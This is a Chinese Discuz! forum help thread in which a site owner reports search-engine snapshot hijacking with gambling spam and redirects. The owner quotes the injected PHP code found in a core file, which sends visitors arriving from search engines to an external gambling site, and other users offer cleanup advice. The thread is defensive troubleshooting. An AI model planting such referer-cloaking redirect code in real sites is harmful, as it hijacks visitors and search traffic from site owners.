Discuz!官方免费开源建站系统

 找回密码
 立即注册

QQ登录

只需一步,快速开始

搜索

[求助] 最新快照劫持及网页篡改网站入侵挂马问题

[复制链接]
张老师101 发表于 2016-12-14 13:00:38 | 显示全部楼层 |阅读模式
本帖最后由 张老师101 于 2016-12-25 22:29 编辑

dz3.2论坛发现网站快照搜索引擎收录,同本网站内容不一致,百度和360以及搜狗都收录了大量本站不存在的帖子,论坛所有帖子和回复都是人工审核的,不可能出现收录的这种博彩类信息。百度收录的快照都点进去不存在,360收录的快照点进去有的是真是的帖子,但和快照内容不一样(帖子内容被替换),有的从搜索引擎点击跳转到一个博彩网站,后检查代码删除一段代码后,不跳转了。
如site:www.op5u.com,出现一堆博彩网站

后来又发现,用百度和360站在工具模拟抓取依然所有文件头部都被插入了链接


技术小白,第一次碰到这种问题,然后在官网上各种查以前朋友遇到是怎么处理的。后台检验文件什么的,经过检查对比文件发现以下几处异常
一、class_core文件头部插入跳转代码
  1. error_reporting(E_ALL);
  2. @error_reporting(1);
  3. @$ref = strtolower($_SERVER['HTTP_REFERER']);
  4. @$jump_ref  = explode("|","haoso.|so.|haosou.|google.|soso.");
  5. foreach($jump_ref as $r){
  6.         $r = trim($r);
  7.         if(stristr($ref,$r)){
  8.                 if($_GET['tid']>50000){
  9.                         header('Location: http://www.yzx002.com/?op5u');
  10.                         die();
  11.                 }
  12.         }
  13. }
复制代码

追加,经过不断排查代码 基本上找到清除完了恶意代码,目前收录逐步恢复中。。。




本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

x
lz49858007 发表于 2016-12-14 14:56:16 | 显示全部楼层
本帖最后由 lz49858007 于 2017-10-8 12:59 编辑

不会是哪里设置的问题吧。









回复

使用道具 举报

1314学习网 发表于 2016-12-14 21:22:18 | 显示全部楼层
补丁打到最新
回复

使用道具 举报

crx349 发表于 2016-12-14 22:43:28 | 显示全部楼层
服务器可能都中毒了 先检查清理哦
回复

使用道具 举报

神农挑号 发表于 2016-12-15 09:19:00 | 显示全部楼层
设置文件权限即可。
回复

使用道具 举报

chbigeye 发表于 2016-12-16 15:07:41 | 显示全部楼层
跟你一样,到现在还不知道原因。。修改了,没几个小时又恢复。。现在是更新缓存,就正常,几个小时后又被劫持。。
回复

使用道具 举报

crx349 发表于 2016-12-16 16:32:31 | 显示全部楼层
chbigeye 发表于 2016-12-16 15:07
跟你一样,到现在还不知道原因。。修改了,没几个小时又恢复。。现在是更新缓存,就正常,几个小时后又被劫 ...

服务器中毒了 尽快清理哦
回复

使用道具 举报

 楼主| 张老师101 发表于 2016-12-17 09:51:16 | 显示全部楼层
chbigeye 发表于 2016-12-16 15:07
跟你一样,到现在还不知道原因。。修改了,没几个小时又恢复。。现在是更新缓存,就正常,几个小时后又被劫 ...

我的基本上解决了,收录恢复更新中
回复

使用道具 举报

chbigeye 发表于 2016-12-18 21:47:39 | 显示全部楼层
张老师101 发表于 2016-12-17 09:51
我的基本上解决了,收录恢复更新中

我的QQ:198587 ,麻烦你加下,有问题想请教!
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

手机版|小黑屋|Discuz! 官方站 ( 皖ICP备16010102号 )star

GMT+8, 2024-12-23 20:38 , Processed in 0.025274 second(s), 5 queries , Gzip On, Redis On.

Powered by Discuz! X3.4

Copyright © 2001-2023, Tencent Cloud.

快速回复 返回顶部 返回列表